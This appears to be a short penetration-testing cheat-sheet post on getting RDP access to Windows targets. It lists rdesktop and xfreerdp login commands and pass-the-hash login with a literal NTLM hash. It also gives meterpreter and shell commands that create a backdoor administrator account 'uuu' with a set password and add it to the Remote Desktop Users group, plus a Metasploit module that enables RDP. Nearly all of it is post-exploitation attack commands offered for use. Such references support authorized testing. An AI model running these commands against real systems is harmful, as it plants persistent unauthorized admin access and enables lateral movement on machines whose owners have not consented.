Use rdesktop for a normal login
rdesktop $target
Normal login for a local user
xfreerdp /cert-ignore /u:user /p:pass /v:$target
Login for a domain user
xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target
To log in with a NTML hash, use xfreerdp.
xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target
Activate
net localgroup "Remote Desktop Users" Administrator /add
Create a new admin and enable RDP
Open a meterpreter shell.
Note: Depending of the system language, the group may not be called “administrators”. Check the name of the administrator group with net localgroup first.
meterpreter > execute -f "net user /add uuu xHQvZRbB%X8F" -i meterpreter > execute -f "net localgroup administrators uuu /add" -i meterpreter > execute -f "net localgroup \"Remote Desktop Users\" uuu /add" -i
Or directly in a shell:
net user /add uuu xHQvZRbB%X8F net localgroup administrators uuu /add net localgroup "Remote Desktop Users" uuu /add
(Don’t use something like 12345678 as password, because this could be silently rejected due to the password policies.)
Activating RDP
- Open a session in Metasploit
- Execute
msf> use post/windows/manage/enable_rdp
Leave a Reply
You must be logged in to post a comment.